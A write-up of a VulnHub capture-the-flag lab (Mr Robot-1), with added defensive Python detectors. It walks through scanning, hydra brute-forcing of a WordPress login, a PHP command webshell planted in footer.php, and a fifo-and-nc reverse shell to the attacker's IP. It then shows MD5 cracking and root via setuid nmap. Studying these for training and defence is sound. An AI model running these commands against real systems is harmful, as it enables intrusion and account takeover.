VulnHub Pentest Diary 13: Mr Robot-1

Preface

⏰ Date: 2023.7.26
🗺️ Target VM: https://www.vulnhub.com/entry/mr-robot-1,151/
⚠️ Every operation in this article was carried out in a lab against the target VM; never use them against real systems without authorization.
🙏 My skills are limited; corrections are welcome. Thank you for reading!
🎉 Feel free to follow 🔍, like 👍, bookmark ⭐️ and leave a comment 📝

Host discovery

PS D:\> nmap -sn 192.168.58.1/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-25 20:47 中国标准时间
Nmap scan report for 192.168.58.153
Host is up (0.00013s latency).
MAC Address: 00:0C:29:54:2C:8C (VMware)
Nmap scan report for 192.168.58.159
Host is up (0.00s latency).
MAC Address: 00:0C:29:CC:79:91 (VMware)
Nmap scan report for 192.168.58.254
Host is up (0.00s latency).
MAC Address: 00:50:56:E2:C0:4E (VMware)
Nmap scan report for 192.168.58.1
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 6.89 seconds

The target is 192.168.58.159

Port scanning

PS D:\> nmap  192.168.58.159
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-25 20:52 中国标准时间
Nmap scan report for 192.168.58.159
Host is up (0.00037s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
443/tcp open   https
MAC Address: 00:0C:29:CC:79:91 (VMware)

PS D:\> nmap -sS -A -T4 -v -p 80,443 192.168.58.159
PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
|_http-server-header: Apache
443/tcp open  ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Issuer: commonName=www.example.com
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2015-09-16T10:45:03
| Not valid after:  2025-09-13T10:45:03
| MD5:   3c163b1987c342ad6634c1c9d0aafb97
|_SHA-1: ef0c5fa5931a09a5687ca2c280c4c79207cef71b
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
MAC Address: 00:0C:29:CC:79:91 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.2 - 4.9
Uptime guess: 0.002 days (since Tue Jul 25 20:50:40 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=251 (Good luck!)
IP ID Sequence Generation: All zeros

GET KEY1

Web scanning

┌──(root㉿kali)-[~]
└─# nikto -h  http://192.168.58.159
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.58.159
+ Target Hostname:    192.168.58.159
+ Target Port:        80
+ Start Time:         2023-07-25 21:30:38 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /SKFr03IP.2: Retrieved x-powered-by header: PHP/5.5.29.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.html, index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ /admin/: This might be interesting.
+ /image/: Drupal Link header found with value: <http://192.168.58.159/?p=23>; rel=shortlink. See: https://www.drupal.org/
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ /wp-login/: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found.
+ /wordpress/wp-admin/wp-login.php: Wordpress login found.
+ /blog/wp-login.php: Wordpress login found.
+ /wp-login.php: Wordpress login found.
+ /wordpress/wp-login.php: Wordpress login found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2023-07-25 21:32:52 (GMT8) (134 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The site runs WordPress.
Directory scan:

┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.58.159 -t 45 -f -e php

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php | HTTP method: GET | Threads: 45 | Wordlist size: 13441

Output File: /root/.dirsearch/reports/192.168.58.159/_23-07-25_21-46-22.txt

Error Log: /root/.dirsearch/logs/errors-23-07-25_21-46-22.log

Target: http://192.168.58.159/

[21:46:42] 200 -    8KB - /0/
[21:47:18] 200 -    1KB - /admin/
[21:47:19] 200 -    1KB - /admin/?/login.php
[21:47:19] 200 -    1KB - /admin/?/login
[21:47:19] 200 -    1KB - /admin/?/login/
[21:47:21] 200 -    1KB - /admin/index
[21:48:18] 200 -    0B  - /favicon.ico
[21:48:19] 200 -  813B  - /feed/
[21:48:28] 200 -   15KB - /image/
[21:48:29] 200 -    1KB - /index.html
[21:48:34] 200 -  504KB - /intro
[21:48:38] 200 -   19KB - /license
[21:48:38] 200 -   19KB - /license.txt
[21:49:13] 200 -   10KB - /readme
[21:49:13] 200 -   10KB - /readme.html
[21:49:15] 200 -   41B  - /robots.txt
[21:49:23] 200 -    0B  - /sitemap
[21:49:23] 200 -    0B  - /sitemap.xml
[21:49:23] 200 -    0B  - /sitemap.xml.gz
[21:49:45] 200 -    1B  - /wp-admin/admin-ajax.php
[21:49:46] 200 -    0B  - /wp-config.php
[21:49:46] 200 -    0B  - /wp-content/
[21:49:46] 200 -    0B  - /wp-content/plugins/google-sitemap-generator/sitemap-core.php
[21:49:46] 200 -    0B  - /wp-cron.php
[21:49:47] 200 -    3KB - /wp-login.php
[21:49:47] 200 -    3KB - /wp-login
[21:49:47] 200 -    3KB - /wp-login/

Task Completed

Visit robots.txt:

User-agent: *
fsocity.dic
key-1-of-3.txt

Downloading fsocity.dic shows that it is a wordlist:

true
false
wikia
from
the
now
Wikia
extensions
scss
window
http
var
page
Robot
Elliot
...

The wordlist looks huge, so deduplicate it first:

┌──(eric㉿Eric)-[/mnt/d/XunleiDownload]
└─$ sort -u fsocity.txt > wordlist.txt

┌──(eric㉿Eric)-[/mnt/d/XunleiDownload]
└─$ wc -l fsocity.txt wordlist.txt
 858160 fsocity.txt
  11451 wordlist.txt
 869611 total

After deduplication only 11451 lines remain.
key-1-of-3.txt is one of the keys:

073403c8a58a1f80d943455fb30724b9

Brute-forcing the login

Visiting wp-login and trying a weak password returns the message "Invalid username".
That error text is a username oracle, so the wordlist obtained above can be used for brute forcing.
Burp Intruder yields the username elliot.
Alternatively use hydra: press F12 in the browser, find the POST request body and copy it.
Then brute-force with hydra's http-post-form module:

┌──(eric㉿Eric)-[/mnt/d/XunleiDownload]
└─$ hydra -L wordlist.txt -p password 192.168.58.159 -t 45 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=https%3A%2F%2F192.168.58.159%2Fwp-admin%2F&testcookie=1:Invalid username"

Hydra likewise finds the valid username elliot.
Then brute-force the password the same way, this time matching on the "is incorrect" error text:

┌──(eric㉿Eric)-[/mnt/d/XunleiDownload]
└─$ hydra -l elliot -P wordlist.txt 192.168.58.159 -t 45 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=https%3A%2F%2F192.168.58.159%2Fwp-admin%2F&testcookie=1:is incorrect"

Password obtained: ER28-0652
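From the defender's side, a hydra run like the one above leaves an unmistakable trace in the web server's access log: hundreds of POSTs to wp-login.php from one source in a few seconds. The following Python is an added example (not part of the original post) that flags such bursts; the log lines in SAMPLE_LOG are constructed, and the threshold and window size are assumed values.

```python
"""Flag brute-force bursts against wp-login.php in Apache combined-format
access logs.  Added example, not from the original post; the log lines in
SAMPLE_LOG are constructed to mimic the hydra run above."""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "ts": datetime.strptime(m["ts"], TS_FMT),
            "method": m["method"], "path": m["path"].split("?")[0],
            "status": int(m["status"])}

def find_login_bursts(lines, threshold=20, window_s=60):
    """Return {ip: total_posts} for IPs that POST to wp-login.php more than
    `threshold` times inside any `window_s`-second sliding window."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].endswith("/wp-login.php"):
            by_ip[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        left = 0
        for right, t in enumerate(times):
            while (t - times[left]).total_seconds() > window_s:
                left += 1          # slide the window forward
            if right - left + 1 > threshold:
                flagged[ip] = len(times)
                break
    return flagged

# Constructed sample: one normal login (302 redirect on success), then a
# 40-request burst from the scanning box in the same minute (200 = login
# form re-rendered with the error message, exactly what hydra matches on).
SAMPLE_LOG = ['10.0.0.5 - - [25/Jul/2023:21:55:00 +0800] "POST /wp-login.php HTTP/1.1" 302 0'] + [
    f'192.168.58.153 - - [25/Jul/2023:21:58:{i:02d} +0800] "POST /wp-login.php HTTP/1.1" 200 3212'
    for i in range(40)
]
```

On a real server, feed `find_login_bursts(open("/var/log/apache2/access.log"))` and pair the result with a rate limit or lockout plugin on wp-login.php.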

Finding an exploitable function

After logging into WordPress, look for a feature that can be abused.
The theme editor allows files to be edited directly, so the following code is written into footer.php:

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Click the Update File button below to save the change.
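A quick way to catch, or prevent, the theme-editor backdoor above, as an added example that is not part of the original post: scan theme and plugin PHP files for command sinks fed by request superglobals, and check that wp-config.php sets DISALLOW_FILE_EDIT, which removes the Appearance > Editor page altogether. The fixture files are constructed in a temp directory; the three-line proximity rule is an assumed heuristic.

```python
"""Scan WordPress theme/plugin PHP files for webshell-style code like the
footer.php payload above, and check whether wp-config.php turns off the
dashboard file editor.  Added example, not from the original post."""
import os
import re
import tempfile

# Command/eval sinks and the request superglobals that typically feed them
SINKS = r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\("
SOURCES = r"\$_(REQUEST|GET|POST|COOKIE)\b"

def scan_php_source(text):
    """Return 1-based line numbers where a sink sits within three lines of a
    request superglobal, a strong indicator of a planted webshell."""
    lines = text.splitlines()
    sink_idx = [i for i, l in enumerate(lines) if re.search(SINKS, l)]
    src_idx = [i for i, l in enumerate(lines) if re.search(SOURCES, l)]
    return sorted(s + 1 for s in sink_idx if any(abs(s - u) <= 3 for u in src_idx))

def scan_tree(root):
    """Walk a theme/plugin directory; return {relative path: [line numbers]}."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_php_source(fh.read())
                if hits:
                    findings[os.path.relpath(path, root)] = hits
    return findings

def file_edit_disabled(wp_config_text):
    """True if wp-config.php defines DISALLOW_FILE_EDIT as true, which removes
    the Appearance > Editor page used above to modify footer.php."""
    pat = r"define\s*\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)"
    return re.search(pat, wp_config_text, re.IGNORECASE) is not None

# Constructed fixture: a clean footer.php and a copy carrying the payload above
CLEAN = "<?php wp_footer(); ?>\n</body>\n</html>\n"
BACKDOORED = ("<?php\nif(isset($_REQUEST['cmd'])){\n    echo '<pre>';\n"
              "    system($_REQUEST['cmd']);\n    die;\n}\n?>\n" + CLEAN)

def demo():
    root = tempfile.mkdtemp()   # throwaway theme directory for the fixture
    os.mkdir(os.path.join(root, "evil"))
    for rel, body in (("footer.php", CLEAN), (os.path.join("evil", "footer.php"), BACKDOORED)):
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    return scan_tree(root)
```

Run `scan_tree("/var/www/html/wp-content")` on a real install; any hit in a theme or plugin file that was not there in the vendor release deserves a manual look.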

GET SHELL

https://192.168.58.159/wordpress/footer.php?cmd=echo+%27ls%27|bash

This confirms that the target has bash.
Check the remote nc command and its version:

which nc; nc -h 2>&1 # merge stderr into stdout, otherwise the help text is not shown
https://192.168.58.159/wordpress/footer.php?cmd=which%20nc%3B%20nc%20-h%202%3E%261

This nc version does not support nc -e for a reverse shell.
Use the fifo method instead:

rm -f /tmp/f;mkfifo /tmp/f;bash < /tmp/f | nc 192.168.58.153 5555 > /tmp/f
https://192.168.58.159/wordpress/footer.php?cmd=rm%20-rf%20/tmp/f;%20mkfifo%20/tmp/f;%20bash%20%3C%20/tmp/f%20|%20nc%20192.168.58.153%205555%20%3E%20/tmp/f

Shell received. Upgrade it to a pty:
python -c 'import pty;pty.spawn("/bin/bash")'
Read wp-config.php to obtain the database credentials.
First look at what is under /home.
key2 cannot be read: permission denied.

GET KEY2

It seems only the robot user can read it.
There is also password.raw-md5, and its mode is 644, so we can read it:

daemon@linux:/home/robot$ cat pass*
cat pass*
robot:c3fcd3d76192e4007dfb496cca67e13b

This should be the MD5 of robot's password; it is unsalted, so look it up on https://hashes.com/en/decrypt/hash
The password is abcdefghijklmnopqrstuvwxyz
su robot switches user directly and yields key2.

GET ROOT KEY3

First check whether the user has sudo rights.
Then look for SUID binaries usable for privilege escalation.
nmap carries the setuid bit; see https://gtfobins.github.io/gtfobins/nmap/

robot@linux:~$ /usr/local/bin/nmap --interactive
/usr/local/bin/nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
# ls /root
ls /root
firstboot_done  key-3-of-3.txt
# cat /root/key*
cat /root/key*
04787ddef27c3dee1ee161b21670b4e4
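A setuid-root nmap is exactly the kind of finding a host audit should surface before anyone else does. The Python below is an added example, not from the original post: it walks a tree for setuid files and flags names from a short, constructed subset of the binaries GTFOBins lists under SUID; the fixture files are created in a temp directory, and on a real host you would call find_suid("/").

```python
"""Audit a filesystem tree for setuid executables and flag the ones known to
hand out a shell when setuid.  Added example, not from the original post."""
import os
import stat
import tempfile

# Constructed, deliberately short subset of the GTFOBins SUID list; nmap's
# --interactive mode (nmap 3.x, as on this box) is the case used above.
KNOWN_SHELL_CAPABLE = {"nmap", "find", "vim", "bash", "python", "env", "cp"}

def find_suid(root):
    """Return sorted paths of regular files under `root` with the setuid bit."""
    found = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue                     # unreadable or vanished entry
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)

def classify(paths):
    """Split setuid files into (high_risk, other) by basename."""
    high = [p for p in paths if os.path.basename(p) in KNOWN_SHELL_CAPABLE]
    other = [p for p in paths if p not in high]
    return high, other

def demo():
    """Constructed fixture: a setuid nmap, a normal ls and a setuid passwd."""
    root = tempfile.mkdtemp()
    for name, mode in (("nmap", 0o4755), ("ls", 0o755), ("passwd", 0o4755)):
        p = os.path.join(root, name)
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(p, mode)                    # owner may set setuid on own file
    high, other = classify(find_suid(root))
    return ([os.path.basename(p) for p in high],
            [os.path.basename(p) for p in other])
```

Anything in the high-risk list that is not a distribution-owned binary (the box's /usr/local/bin/nmap is a textbook case) should lose its setuid bit with chmod u-s or be removed.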

